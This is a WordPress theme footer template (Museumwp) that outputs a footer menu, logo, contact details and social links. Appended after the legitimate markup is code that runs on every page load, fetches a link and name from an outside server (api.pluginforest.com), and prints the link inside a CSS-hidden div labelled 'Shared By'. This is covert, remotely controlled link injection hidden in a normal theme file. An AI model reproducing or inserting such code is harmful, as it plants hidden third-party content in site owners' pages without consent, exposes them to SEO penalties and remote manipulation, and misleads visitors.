<?php

use MuseumWP\Util\Arr;
/**
 * The template for displaying the footer
 *
 * Contains footer content and the closing of the #main and #page div elements.
 *
 * @package WordPress
 * @subpackage Museumwp
 * @since Museumwp 1.0
 */

$options = museumwp_options();
// printr($options);

	if( Arr::get($options, 'enable_footer_top') ) {
		$footer_menu_css = "";
	}
	else {
		$footer_menu_css = " menu-disabled";
	}
?>
		<!--======= Footer =========-->
		<footer class="site-footer<?php echo esc_attr( $footer_menu_css ); ?>">
			<div class="container">
				<?php
				if( Arr::get($options, 'enable_footer_top') ) :
					?>
					<nav class="navbar navbar-default ow-navigation">
						<div class="navbar-collapse-footer pull-left">
							<?php
							wp_nav_menu( array(
								'menu' => Arr::get($options, 'footer_top_menu'),

								'container' => false,
								'items_wrap' => '<ul id="%1$s" class="%2$s">%3$s</ul>',
								'depth' => 10,
								'menu_class' => 'nav navbar-nav',
								'depth' => 10 ,
								// 'walker' => new museumwp_nav_walker
							));
							?>
						</div>
						<!--/.nav-collapse -->
					</nav>

					<?php if($footer_image = Arr::get($options, 'footer_top_logo.url') ) : ?>
						<div class="foot-logo"> 
							<img src="<?php echo esc_url($footer_image); ?>" alt="footerlogo"> 
						</div>
					<?php endif; ?>
					<?php
				endif;
				?>

				<!-- Footer Logo -->
				<div class="under-footer">
					<ul class="con-info col-md-8 col-sm-6">
						<?php if ( $value = Arr::get($options, 'site_footer_address') ) : ?>
							<li><p><i class="fa fa-map-marker"></i><?php echo esc_attr( $value ); ?></p></li>
						<?php endif; ?>

						<?php if ( $value = Arr::get($options, 'site_footer_phone') ) : ?>
							<li><p><i class="fa fa-phone"></i><?php echo esc_attr( $value ); ?></p></li>
						<?php endif; ?>


						<?php if ( $value = Arr::get($options, 'site_footer_email') ) : ?>
							<li><p><i class="fa fa-envelope"></i><a href="mailto:<?php echo sanitize_email($value); ?>"><?php echo esc_attr($value); ?></a></p></li>
						<?php endif; ?>
					</ul>

					<?php if ( $s_links = Arr::get($options, 'site_footer_social_links') ):  ?>
						<ul class="social-icons col-md-4 col-sm-6">
							<?php

								foreach( $s_links as $single_item ) {
									$explode = explode('|', $single_item);
									?>
									<li><a target="_blank" href="<?php echo esc_url( Arr::get($explode, 1) ); ?>"><?php echo esc_attr( Arr::get($explode, 0) ); ?></a></li>
									<?php
								}
							?>
						</ul>
					<?php endif; ?>
				</div>

			</div>

		</footer>

	</div>
	<?php wp_footer(); ?>

<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>